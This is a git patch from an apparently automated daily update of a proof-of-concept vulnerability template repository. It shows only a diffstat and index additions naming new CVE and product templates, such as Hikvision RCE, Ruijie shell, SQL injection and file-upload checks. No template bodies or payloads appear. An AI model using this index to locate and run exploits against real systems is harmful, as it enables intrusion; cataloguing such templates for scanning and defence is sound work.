From 97eb6f52f7b073d24ce107b81c49131ae84b861f Mon Sep 17 00:00:00 2001 
From: GitHub Action Date: Thu, 29 Aug 2024 12:38:48 +0000 Subject: [PATCH] 20240829 --- date.txt | 2 +- poc.txt | 93 +++++++++++++++++++ poc/auth/BlindSQLAuth.yaml | 66 ++++++------- "poc/cve/CVE-2021\342\200\22320837.yaml" | 43 ++++++--- ...2440-d3549549b7d1d1f9c5181225b19ec097.yaml | 59 ++++++++++++ ...6858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml | 59 ++++++++++++ ...1056-67c2890890023e1dcaf3fcf02b7286ad.yaml | 59 ++++++++++++ ...1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml | 59 ++++++++++++ ...2541-49857937876d85d5d1abd5bfb380cf51.yaml | 59 ++++++++++++ ...3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml | 59 ++++++++++++ ...3679-027fedcab741a41badcd943e1f2670dd.yaml | 59 ++++++++++++ ...7540-41966b5363ceb49c1002bf890479040a.yaml | 59 ++++++++++++ ...7921-32c9b35565d965fce9f085fa275f2788.yaml | 59 ++++++++++++ ...3944-1cac4b0f9145e2f8f8e951e09918d457.yaml | 59 ++++++++++++ ...9638-69edc4c284df671b2ba465627be06431.yaml | 59 ++++++++++++ ...3915-77573ddf79e044c9a0d67924130e634b.yaml | 59 ++++++++++++ ...3916-1015b08d9eca60e9a1481bb46ac69da5.yaml | 59 ++++++++++++ ...3917-4df54e0a00866edc142ed2d2dc516949.yaml | 59 ++++++++++++ ...3918-36bcfe8513ceb7715d00cdc97a346f97.yaml | 59 ++++++++++++ ...3966-46b00b07942b65c4dcb18883031ed53e.yaml | 59 ++++++++++++ ...3967-5df69edf490a8e0fdecd3e9d85b38254.yaml | 59 ++++++++++++ ...5857-3d292977eef774943a0aa421905b95f9.yaml | 59 ++++++++++++ ...5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6311.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6312.yaml | 59 ++++++++++++ ...6330-4e4c561294cfdcf71842373037d4d2e3.yaml | 59 ++++++++++++ poc/cve/CVE-2024-6448.yaml | 59 ++++++++++++ ...6451-07f7ccbed8a5e6918f12a0374cac643f.yaml | 59 ++++++++++++ ...6551-71cd34e5a5ee9991ff68a34f6b666def.yaml | 59 ++++++++++++ ...6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml | 59 ++++++++++++ ...6879-408050f5fa9936779918006e4415cd11.yaml | 59 ++++++++++++ ...7030-1f332171cf5ea8b289acd21b158dc3ee.yaml | 59 ++++++++++++ 
...7032-cabe7edb9453e46b358c075428df2586.yaml | 59 ++++++++++++ ...7313-b762e54f8085d18804da0898542a5ec1.yaml | 59 ++++++++++++ ...7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7447.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7573.yaml | 59 ++++++++++++ ...7606-06ad2ab98249fa61f169a794d53b3d8d.yaml | 59 ++++++++++++ ...7607-4e7f3690990262b436b42cdf215f4676.yaml | 59 ++++++++++++ ...7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml | 59 ++++++++++++ ...7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml | 59 ++++++++++++ poc/cve/CVE-2024-7863.yaml | 59 ++++++++++++ ...7895-ac1e11d6be8490c8494a930a375e9a8e.yaml | 59 ++++++++++++ poc/cve/CVE-2024-8030.yaml | 59 ++++++++++++ ...8043-613641adfae0294950a0fa915c4316f4.yaml | 59 ++++++++++++ ...8044-c5c06b8842bfb695b2f240b2af75787b.yaml | 59 ++++++++++++ ...8047-f6817d306b4651cd60631b6b036a3959.yaml | 59 ++++++++++++ ...8051-13d32e37d22c86e6841489ccba7dbaab.yaml | 59 ++++++++++++ ...8052-e7604b09bc8937658ab6d84d35011faf.yaml | 59 ++++++++++++ ...8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml | 59 ++++++++++++ poc/cve/CVE-2024-8195.yaml | 59 ++++++++++++ poc/cve/cve-2016-6210.yaml | 8 +- poc/cve/cve-2017-14524.yaml | 42 ++++++--- poc/cve/cve-2018-1271.yaml | 16 ++-- poc/cve/cve-2018-15473.yaml | 14 +-- poc/cve/cve-2018-18778.yaml | 11 +-- .../salesforce-contentdocument-detector.yaml | 37 ++++++++ poc/exposed/exposed-springboot.yaml | 8 +- poc/http/cl-te-http-smuggling.yaml | 72 +++++++------- ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 ++++++---- .../Hikvision_iVMS-8700_upload_action.yaml | 40 ++++---- ...orms-881dfd77d6d86c39aaa256deaef65e79.yaml | 59 ++++++++++++ .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...free-d673e9b78beed9be045c9fddcda8387c.yaml | 59 ++++++++++++ ...tems-27adb5630206288cc4533169053590e1.yaml | 59 ++++++++++++ ...eams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml | 59 ++++++++++++ poc/other/Dahua_getUserInfoByUserName.yaml | 18 ++-- .../Hikvision_Env_Information_Leakage.yaml 
| 42 +++++---- poc/other/Ruijie_EXCU_SHELL.yaml | 30 +++--- ...gine-3bae955ccade96ed3bb2f0c913880abb.yaml | 59 ++++++++++++ ...olio-937e73528345004677d696748421a9a3.yaml | 59 ++++++++++++ ...sion-7f5f101995ccdcf10c7e7f5808c934b6.yaml | 59 ++++++++++++ ...stem-8649e5bc1fc86fb49801894149b7194d.yaml | 59 ++++++++++++ ...quiz-e57df0d2ff1d620125911e7a7435441f.yaml | 59 ++++++++++++ ...cker-707207d8728290146b99c3b10fa2d8a1.yaml | 59 ++++++++++++ poc/other/dom-invaider.yaml | 15 +-- ...sers-90df2a922aebe8c48da99b7fe999c319.yaml | 59 ++++++++++++ ...-pro-eb1e588869835492ad97803c9c5af7ab.yaml | 59 ++++++++++++ ...give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml | 59 ++++++++++++ ...wrap-ac5f97e3e98b5cccd5e941c630594293.yaml | 59 ++++++++++++ ...plus-305e1ca5563918c203ad44639d735fe6.yaml | 59 ++++++++++++ poc/other/mobile-security-framework.yaml | 20 ++++ ...naar-d5f0e031999dc4b1252ad5515dddcfaf.yaml | 59 ++++++++++++ ...pack-016f4f965dace571e947d960d2934b03.yaml | 59 ++++++++++++ ...next-a245f156676109e1d14f3370b00c9905.yaml | 59 ++++++++++++ ...tags-3f67e2b8c30c94499ec4eae8289c70a2.yaml | 59 ++++++++++++ ...ndar-cff64aa365787e00304f119ad6984b45.yaml | 59 ++++++++++++ ...grid-11c57e46d323949f1474677c8ea8f409.yaml | 59 ++++++++++++ ...weet-250b3e7014946f4e8b446448451f1a15.yaml | 59 ++++++++++++ ...-pro-feb88140040e1c1f4c2ea5be5291d525.yaml | 59 ++++++++++++ ...ager-ae04686326d43f919e9c393e1e364c95.yaml | 59 ++++++++++++ .../Hikvision_applyCT_RCE.yaml | 45 ++++++--- .../salesforce-contentdocument-detector.yaml | 37 ++++++++ ...list-0ce5399103aadb3b44c880eafe1a56e5.yaml | 59 ++++++++++++ ...ugin-7e067968dc74df931237c1c4dd7e5960.yaml | 59 ++++++++++++ poc/search/relevanssi-live-ajax-search.yaml | 59 ++++++++++++ poc/sql/BlindSQLAuth.yaml | 66 ++++++------- ...7032-cabe7edb9453e46b358c075428df2586.yaml | 59 ++++++++++++ ...7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml | 59 ++++++++++++ ...8051-13d32e37d22c86e6841489ccba7dbaab.yaml | 59 ++++++++++++ 
...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 49 +++++++--- ...sers-947badb91b071755d9969be9242e4456.yaml | 59 ++++++++++++ ...lder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml | 59 ++++++++++++ ...tems-27adb5630206288cc4533169053590e1.yaml | 59 ++++++++++++ ...itor-28b564b15db8ff756b87ff0ae5c6d260.yaml | 59 ++++++++++++ ...list-0ce5399103aadb3b44c880eafe1a56e5.yaml | 59 ++++++++++++ ...ager-2f2a157dfc44eea8c90827e9ff434dbb.yaml | 59 ++++++++++++ poc/sql_injection/BlindSQLAuth.yaml | 66 ++++++------- ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 49 +++++++--- poc/upload/Dahua_Video_FileUpload.yaml | 42 +++------ ...Hikvision_iVMS-8700_Fileupload_report.yaml | 47 ++++++---- .../Hikvision_iVMS-8700_upload_action.yaml | 40 ++++---- .../Nsfocus_NF_Firewall_FileUpload.yaml | 31 +------ .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...ecology_E-Office_Uploadify_FileUpload.yaml | 30 ++++-- .../dahua-wpms-addimgico-fileupload.yaml | 78 ++++++++++------ ...y-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml | 59 ++++++++++++ ...lper-2ebee88d3cc127551f1f7c34b744653e.yaml | 59 ++++++++++++ ...wall-2453dc94f5e62cf781881087cb516889.yaml | 59 ++++++++++++ ...lder-096fe66e1a6c03883512b366b27ff120.yaml | 59 ++++++++++++ ...dget-71769af2cc0004162bfc766437dc74d0.yaml | 59 ++++++++++++ ...dget-82d487f0b8fd6103c1335305b84fab11.yaml | 59 ++++++++++++ ...todo-d321c83fc92b177a4feede0546be070b.yaml | 59 ++++++++++++ 123 files changed, 6159 insertions(+), 511 deletions(-) create mode 100644 poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml create mode 100644 poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml create mode 100644 poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml create mode 100644 poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml create mode 100644 poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml create mode 100644 poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml create mode 100644 
poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml create mode 100644 poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml create mode 100644 poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml create mode 100644 poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml create mode 100644 poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml create mode 100644 poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml create mode 100644 poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml create mode 100644 poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml create mode 100644 poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml create mode 100644 poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml create mode 100644 poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml create mode 100644 poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml create mode 100644 poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml create mode 100644 poc/cve/CVE-2024-6311.yaml create mode 100644 poc/cve/CVE-2024-6312.yaml create mode 100644 poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml create mode 100644 poc/cve/CVE-2024-6448.yaml create mode 100644 poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml create mode 100644 poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml create mode 100644 poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml create mode 100644 poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml create mode 100644 poc/cve/CVE-2024-7030-1f332171cf5ea8b289acd21b158dc3ee.yaml create mode 100644 poc/cve/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml create mode 100644 poc/cve/CVE-2024-7313-b762e54f8085d18804da0898542a5ec1.yaml create mode 100644 poc/cve/CVE-2024-7418-c9bdaa080236ee0e574742a6ecd2aa08.yaml create mode 100644 poc/cve/CVE-2024-7447.yaml create mode 100644 poc/cve/CVE-2024-7573.yaml create mode 100644 
poc/cve/CVE-2024-7606-06ad2ab98249fa61f169a794d53b3d8d.yaml create mode 100644 poc/cve/CVE-2024-7607-4e7f3690990262b436b42cdf215f4676.yaml create mode 100644 poc/cve/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml create mode 100644 poc/cve/CVE-2024-7857-a18aa7c9dff5c4191bbf30ebf29a07a1.yaml create mode 100644 poc/cve/CVE-2024-7863.yaml create mode 100644 poc/cve/CVE-2024-7895-ac1e11d6be8490c8494a930a375e9a8e.yaml create mode 100644 poc/cve/CVE-2024-8030.yaml create mode 100644 poc/cve/CVE-2024-8043-613641adfae0294950a0fa915c4316f4.yaml create mode 100644 poc/cve/CVE-2024-8044-c5c06b8842bfb695b2f240b2af75787b.yaml create mode 100644 poc/cve/CVE-2024-8047-f6817d306b4651cd60631b6b036a3959.yaml create mode 100644 poc/cve/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml create mode 100644 poc/cve/CVE-2024-8052-e7604b09bc8937658ab6d84d35011faf.yaml create mode 100644 poc/cve/CVE-2024-8091-2a76422fe65a9439ffb66d6cccbb9f37.yaml create mode 100644 poc/cve/CVE-2024-8195.yaml create mode 100644 poc/detect/salesforce-contentdocument-detector.yaml create mode 100644 poc/microsoft/arforms-881dfd77d6d86c39aaa256deaef65e79.yaml create mode 100644 poc/microsoft/funnelforms-free-d673e9b78beed9be045c9fddcda8387c.yaml create mode 100644 poc/microsoft/special-feed-items-27adb5630206288cc4533169053590e1.yaml create mode 100644 poc/microsoft/visual-sound-widget-for-soundcloud-and-artistplugme-visualdreams-5722dca07cc58dd07b8ebb2a7f03be3f.yaml create mode 100644 poc/other/ai-engine-3bae955ccade96ed3bb2f0c913880abb.yaml create mode 100644 poc/other/auxin-portfolio-937e73528345004677d696748421a9a3.yaml create mode 100644 poc/other/beaver-builder-lite-version-7f5f101995ccdcf10c7e7f5808c934b6.yaml create mode 100644 poc/other/booking-system-8649e5bc1fc86fb49801894149b7194d.yaml create mode 100644 poc/other/chained-quiz-e57df0d2ff1d620125911e7a7435441f.yaml create mode 100644 poc/other/ditty-news-ticker-707207d8728290146b99c3b10fa2d8a1.yaml create mode 100644 
poc/other/front-end-only-users-90df2a922aebe8c48da99b7fe999c319.yaml create mode 100644 poc/other/funnel-builder-pro-eb1e588869835492ad97803c9c5af7ab.yaml create mode 100644 poc/other/give-5a41f38fc1abdcc291ed6c8ada86ceb0.yaml create mode 100644 poc/other/infolinks-ad-wrap-ac5f97e3e98b5cccd5e941c630594293.yaml create mode 100644 poc/other/media-library-plus-305e1ca5563918c203ad44639d735fe6.yaml create mode 100644 poc/other/mobile-security-framework.yaml create mode 100644 poc/other/mp3-music-player-by-sonaar-d5f0e031999dc4b1252ad5515dddcfaf.yaml create mode 100644 poc/other/premium-seo-pack-016f4f965dace571e947d960d2934b03.yaml create mode 100644 poc/other/quiz-master-next-a245f156676109e1d14f3370b00c9905.yaml create mode 100644 poc/other/ratings-shorttags-3f67e2b8c30c94499ec4eae8289c70a2.yaml create mode 100644 poc/other/registrations-for-the-events-calendar-cff64aa365787e00304f119ad6984b45.yaml create mode 100644 poc/other/the-post-grid-11c57e46d323949f1474677c8ea8f409.yaml create mode 100644 poc/other/vikinghammer-tweet-250b3e7014946f4e8b446448451f1a15.yaml create mode 100644 poc/other/woo-producttables-pro-feb88140040e1c1f4c2ea5be5291d525.yaml create mode 100644 poc/other/zephyr-project-manager-ae04686326d43f919e9c393e1e364c95.yaml create mode 100644 poc/remote_code_execution/salesforce-contentdocument-detector.yaml create mode 100644 poc/remote_code_execution/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml create mode 100644 poc/search/extended-search-plugin-7e067968dc74df931237c1c4dd7e5960.yaml create mode 100644 poc/search/relevanssi-live-ajax-search.yaml create mode 100644 poc/sql/CVE-2024-7032-cabe7edb9453e46b358c075428df2586.yaml create mode 100644 poc/sql/CVE-2024-7856-d011db87e0fcbee1bbbd734bfc806dcf.yaml create mode 100644 poc/sql/CVE-2024-8051-13d32e37d22c86e6841489ccba7dbaab.yaml create mode 100644 poc/sql/front-end-only-users-947badb91b071755d9969be9242e4456.yaml create mode 100644 
poc/sql/popup-builder-6301c8edbc1b7bd38ba274bd8ed00bc7.yaml create mode 100644 poc/sql/special-feed-items-27adb5630206288cc4533169053590e1.yaml create mode 100644 poc/sql/theme-editor-28b564b15db8ff756b87ff0ae5c6d260.yaml create mode 100644 poc/sql/ti-woocommerce-wishlist-0ce5399103aadb3b44c880eafe1a56e5.yaml create mode 100644 poc/sql/zephyr-project-manager-2f2a157dfc44eea8c90827e9ff434dbb.yaml create mode 100644 poc/wordpress/geo-my-wp-dcc08c9ab9de422a732b6dceb3c19f4e.yaml create mode 100644 poc/wordpress/wp-accessibility-helper-2ebee88d3cc127551f1f7c34b744653e.yaml create mode 100644 poc/wordpress/wp-simple-firewall-2453dc94f5e62cf781881087cb516889.yaml create mode 100644 poc/wordpress/wp-table-builder-096fe66e1a6c03883512b366b27ff120.yaml create mode 100644 poc/wordpress/wp-testimonial-widget-71769af2cc0004162bfc766437dc74d0.yaml create mode 100644 poc/wordpress/wp-testimonial-widget-82d487f0b8fd6103c1335305b84fab11.yaml create mode 100644 poc/wordpress/wp-todo-d321c83fc92b177a4feede0546be070b.yaml
diff --git a/date.txt b/date.txt
index 00e43a06f4..0b8bcefbec 100644
--- a/date.txt
+++ b/date.txt
@@ -1 +1 @@
-20240828
+20240829
diff --git a/poc.txt b/poc.txt
index 989db77c8f..1b03bfc2df 100644
--- a/poc.txt
+++ b/poc.txt
@@ -20007,6 +20007,7 @@
 ./poc/cve/CVE-2022-2438-e23067b73cd2465094908dfe66e68a56.yaml
 ./poc/cve/CVE-2022-2438.yaml
 ./poc/cve/CVE-2022-24384.yaml
+./poc/cve/CVE-2022-2440-d3549549b7d1d1f9c5181225b19ec097.yaml
 ./poc/cve/CVE-2022-2441-94e48155bec5b25aea537c2fd89d3e2c.yaml
 ./poc/cve/CVE-2022-2441.yaml
 ./poc/cve/CVE-2022-2442-7a5fbc6b620266c52d8b0c6db0f4ba91.yaml
@@ -22724,6 +22725,7 @@
 ./poc/cve/CVE-2022-46856.yaml
 ./poc/cve/CVE-2022-46857-6eea60cd30202102fb633d2eef77e143.yaml
 ./poc/cve/CVE-2022-46857.yaml
+./poc/cve/CVE-2022-46858-0447202dcc657f8b5ce7f72ec5cf2c5e.yaml
 ./poc/cve/CVE-2022-46858-64552307c89bcb47f6d5ba59e80e5c98.yaml
 ./poc/cve/CVE-2022-46858.yaml
 ./poc/cve/CVE-2022-46859-5e59d6d5372551970b346415e4d96b7b.yaml
@@ -33073,6 +33075,7 @@
 ./poc/cve/CVE-2024-1054.yaml
 ./poc/cve/CVE-2024-1055-d648797daf2d40f2e3020df2557ea8d6.yaml
 ./poc/cve/CVE-2024-1055.yaml
+./poc/cve/CVE-2024-1056-67c2890890023e1dcaf3fcf02b7286ad.yaml
 ./poc/cve/CVE-2024-1057-7965d17e1316abe215e22b7e9f9e3d34.yaml
 ./poc/cve/CVE-2024-1057.yaml
 ./poc/cve/CVE-2024-1058-ee29f13d5975fd520360e5ea7be92c39.yaml
@@ -33409,6 +33412,7 @@
 ./poc/cve/CVE-2024-1382.yaml
 ./poc/cve/CVE-2024-1383-7b045eb38e258dc8f4536f2cc37c96c3.yaml
 ./poc/cve/CVE-2024-1383.yaml
+./poc/cve/CVE-2024-1384-a9a20a9963188caf2d7ca5d11ff8354e.yaml
 ./poc/cve/CVE-2024-1385-818100a011ddc865608e7783aa650542.yaml
 ./poc/cve/CVE-2024-1385.yaml
 ./poc/cve/CVE-2024-1386-9f49adb4a1553fb7e5f119061067e3f5.yaml
@@ -34842,6 +34846,7 @@
 ./poc/cve/CVE-2024-2538.yaml
 ./poc/cve/CVE-2024-2539-7c8ec8552fe31674d2a09f50099b62db.yaml
 ./poc/cve/CVE-2024-2539.yaml
+./poc/cve/CVE-2024-2541-49857937876d85d5d1abd5bfb380cf51.yaml
 ./poc/cve/CVE-2024-2542-c8a8658aca4fa9d4ee0855526de65460.yaml
 ./poc/cve/CVE-2024-2542.yaml
 ./poc/cve/CVE-2024-2543-f48246ffc4fb98da59759110814c6ac9.yaml
@@ -37168,6 +37173,7 @@
 ./poc/cve/CVE-2024-32818.yaml
 ./poc/cve/CVE-2024-32819-b2efe288ed999c4e86752c15cb39df1e.yaml
 ./poc/cve/CVE-2024-32819.yaml
+./poc/cve/CVE-2024-3282-c2b556dd2eaeb747bc64cf55c4abafd6.yaml
 ./poc/cve/CVE-2024-32820-71e856bbfeae5e39e580699130259df9.yaml
 ./poc/cve/CVE-2024-32820.yaml
 ./poc/cve/CVE-2024-32821-a1073ef2fb823793f35d551971666c90.yaml
@@ -38480,6 +38486,7 @@
 ./poc/cve/CVE-2024-3677.yaml
 ./poc/cve/CVE-2024-3678-f53f05c8b6a185799c66e4e83f0a7ba4.yaml
 ./poc/cve/CVE-2024-3678.yaml
+./poc/cve/CVE-2024-3679-027fedcab741a41badcd943e1f2670dd.yaml
 ./poc/cve/CVE-2024-3680-23ea719e8617bbc7e76892e92d138752.yaml
 ./poc/cve/CVE-2024-3680-ec7d53ee9433a071987bdb6ca3443c79.yaml
 ./poc/cve/CVE-2024-3680.yaml
@@ -38987,6 +38994,7 @@
 ./poc/cve/CVE-2024-37539.yaml
 ./poc/cve/CVE-2024-3754-5cb1674c7f47c3b022a3d4bf7b71ef2e.yaml
 ./poc/cve/CVE-2024-3754.yaml
+./poc/cve/CVE-2024-37540-41966b5363ceb49c1002bf890479040a.yaml
 ./poc/cve/CVE-2024-37540-8cbf618dd92d73c44ede2777170fcf11.yaml
 ./poc/cve/CVE-2024-37540.yaml
 ./poc/cve/CVE-2024-37543-45498458ade80405d5c87896b7d832be.yaml
@@ -39050,6 +39058,7 @@
 ./poc/cve/CVE-2024-37919.yaml
 ./poc/cve/CVE-2024-37920-335be5b5f325b697f46824959f7e9689.yaml
 ./poc/cve/CVE-2024-37920.yaml
+./poc/cve/CVE-2024-37921-32c9b35565d965fce9f085fa275f2788.yaml
 ./poc/cve/CVE-2024-37922-871cb4ded694b4a55787d352462ee8a0.yaml
 ./poc/cve/CVE-2024-37922.yaml
 ./poc/cve/CVE-2024-37923-6a14d11a54353b3a8db40e6351e11b46.yaml
@@ -39545,6 +39554,7 @@
 ./poc/cve/CVE-2024-3942.yaml
 ./poc/cve/CVE-2024-3943-fa7581cdf62fb0e87bf4eab4b31bd83c.yaml
 ./poc/cve/CVE-2024-3943.yaml
+./poc/cve/CVE-2024-3944-1cac4b0f9145e2f8f8e951e09918d457.yaml
 ./poc/cve/CVE-2024-3945-018f8088237d45b71c8d194c577272ca.yaml
 ./poc/cve/CVE-2024-3945.yaml
 ./poc/cve/CVE-2024-3946-c60d5b669b2319d7b35ed61c7b3c3d22.yaml
@@ -39602,6 +39612,7 @@
 ./poc/cve/CVE-2024-39636.yaml
 ./poc/cve/CVE-2024-39637-b2aa75dc928f753243f5e3cd1c699516.yaml
 ./poc/cve/CVE-2024-39637.yaml
+./poc/cve/CVE-2024-39638-69edc4c284df671b2ba465627be06431.yaml
 ./poc/cve/CVE-2024-39639-87f7d58a0766d71b6c41d8120ed1777a.yaml
 ./poc/cve/CVE-2024-39639.yaml
 ./poc/cve/CVE-2024-3964-056dc5456ab6841bec0c77f7e0bf35ff.yaml
@@ -40411,10 +40422,16 @@
 ./poc/cve/CVE-2024-4390.yaml
 ./poc/cve/CVE-2024-4391-985e97773b03a11e8b2a9fb7940543b5.yaml
 ./poc/cve/CVE-2024-4391.yaml
+./poc/cve/CVE-2024-43915-77573ddf79e044c9a0d67924130e634b.yaml
+./poc/cve/CVE-2024-43916-1015b08d9eca60e9a1481bb46ac69da5.yaml
+./poc/cve/CVE-2024-43917-4df54e0a00866edc142ed2d2dc516949.yaml
+./poc/cve/CVE-2024-43918-36bcfe8513ceb7715d00cdc97a346f97.yaml
 ./poc/cve/CVE-2024-4392-82902aa50e08075fddd71499e6afbe8c.yaml
 ./poc/cve/CVE-2024-4392.yaml
 ./poc/cve/CVE-2024-4393-45e2b89ab04106f575ed8b1663572c75.yaml
 ./poc/cve/CVE-2024-4393.yaml
+./poc/cve/CVE-2024-43966-46b00b07942b65c4dcb18883031ed53e.yaml
+./poc/cve/CVE-2024-43967-5df69edf490a8e0fdecd3e9d85b38254.yaml
 ./poc/cve/CVE-2024-4397-c362279c76703f9b7d6880221e199134.yaml
 ./poc/cve/CVE-2024-4397.yaml
 ./poc/cve/CVE-2024-4398-7665e7d89d07848b27bc3ed2a158e28c.yaml
@@ -41364,6 +41381,7 @@
 ./poc/cve/CVE-2024-5855.yaml
 ./poc/cve/CVE-2024-5856-f4b3755f41d76fe6fb4177e59e83affd.yaml
 ./poc/cve/CVE-2024-5856.yaml
+./poc/cve/CVE-2024-5857-3d292977eef774943a0aa421905b95f9.yaml
 ./poc/cve/CVE-2024-5858-8478fd188db095b50a710c21aa308605.yaml
 ./poc/cve/CVE-2024-5858.yaml
 ./poc/cve/CVE-2024-5859-c33eb50a462c617bcdf763f4fbbb0f02.yaml
@@ -41435,6 +41453,7 @@
 ./poc/cve/CVE-2024-5975-63142a8dc0e1975c354668fd03c9e205.yaml
 ./poc/cve/CVE-2024-5977-4c5264cce514f6cea533513004f89b25.yaml
 ./poc/cve/CVE-2024-5977.yaml
+./poc/cve/CVE-2024-5987-6cc5d4e6d8cd1245677ac675a8fe0530.yaml
 ./poc/cve/CVE-2024-5992-17371c3c551fc1c7a97635e9a49f9659.yaml
 ./poc/cve/CVE-2024-5992-2b755cd88a4a27a7b1b3570016d83b8e.yaml
 ./poc/cve/CVE-2024-5992.yaml
@@ -41625,7 +41644,9 @@
 ./poc/cve/CVE-2024-6310-0419671d8f80f6b6a9d502c2d8ba3340.yaml
 ./poc/cve/CVE-2024-6310.yaml
 ./poc/cve/CVE-2024-6311-d89cc033454f8c35267fb7ae63d8e47c.yaml
+./poc/cve/CVE-2024-6311.yaml
 ./poc/cve/CVE-2024-6312-b9fa815eabbece02fbe913e892ae3664.yaml
+./poc/cve/CVE-2024-6312.yaml
 ./poc/cve/CVE-2024-6313-167d3456f11a505fc0773b04d8885737.yaml
 ./poc/cve/CVE-2024-6313.yaml
 ./poc/cve/CVE-2024-6314-a8fb870094e2797c6be405b1023e20a9.yaml
@@ -41646,6 +41667,7 @@
 ./poc/cve/CVE-2024-6321.yaml
 ./poc/cve/CVE-2024-6328-dcb1447304523613e0a565cd368725f8.yaml
 ./poc/cve/CVE-2024-6328.yaml
+./poc/cve/CVE-2024-6330-4e4c561294cfdcf71842373037d4d2e3.yaml
 ./poc/cve/CVE-2024-6334-32cc27bdc2750532a6a94260dc479796.yaml
 ./poc/cve/CVE-2024-6334.yaml
 ./poc/cve/CVE-2024-6338-2cb15f594519463fb002e59f93b4f8b0.yaml
@@ -41694,6 +41716,8 @@
 ./poc/cve/CVE-2024-6447-1130432e15f90ec4bd6402483af13599.yaml
 ./poc/cve/CVE-2024-6447.yaml
 ./poc/cve/CVE-2024-6448-6501d01ff6b00a92c3945ba82a07cc38.yaml
+./poc/cve/CVE-2024-6448.yaml
+./poc/cve/CVE-2024-6451-07f7ccbed8a5e6918f12a0374cac643f.yaml
 ./poc/cve/CVE-2024-6455-d3c25371d6b0981179823fa90a262c4e.yaml
 ./poc/cve/CVE-2024-6455.yaml
 ./poc/cve/CVE-2024-6457-8fe82c0d2bc0d7c6719dbb664464107d.yaml
@@ -41764,6 +41788,7 @@
 ./poc/cve/CVE-2024-6549.yaml
 ./poc/cve/CVE-2024-6550-879ce5421f391ab061ab24b1a7b2f495.yaml
 ./poc/cve/CVE-2024-6550.yaml
+./poc/cve/CVE-2024-6551-71cd34e5a5ee9991ff68a34f6b666def.yaml
 ./poc/cve/CVE-2024-6552-e7ac760f6e93c0dbf11edf688d8d1c1e.yaml
 ./poc/cve/CVE-2024-6552.yaml
 ./poc/cve/CVE-2024-6553-9d3dee97ff0d9472e213f39b23874043.yaml
@@ -41890,6 +41915,7 @@
 ./poc/cve/CVE-2024-6712.yaml
 ./poc/cve/CVE-2024-6713-721684c67d2a1a8a863ea18abb9bf88d.yaml
 ./poc/cve/CVE-2024-6713.yaml
+./poc/cve/CVE-2024-6715-ae0f82685b3de95ecd0d10ca1e832b49.yaml
 ./poc/cve/CVE-2024-6718-248ea11ff135db64e4802002a7613eb0.yaml
 ./poc/cve/CVE-2024-6718.yaml
 ./poc/cve/CVE-2024-6720-55495b760f061287bdd9b98d9853a7dd.yaml
@@ -41960,6 +41986,7 @@
 ./poc/cve/CVE-2024-6870.yaml
 ./poc/cve/CVE-2024-6872-906780e4d16fb616e7eb84af4109c545.yaml
 ./poc/cve/CVE-2024-6872.yaml
+./poc/cve/CVE-2024-6879-408050f5fa9936779918006e4415cd11.yaml
 ./poc/cve/CVE-2024-6883-60bd6a9f405aa3424be36169fb71a51f.yaml
 ./poc/cve/CVE-2024-6883-bf3d691e7629ebe7204e53eef0a10a24.yaml
 ./poc/cve/CVE-2024-6883.yaml
@@ -41989,11 +42016,13 @@
 ./poc/cve/CVE-2024-6987.yaml
 ./poc/cve/CVE-2024-7027-90534f21ba7ac35c6aefb4db06d95b2d.yaml
 ./poc/cve/CVE-2024-7027.yaml
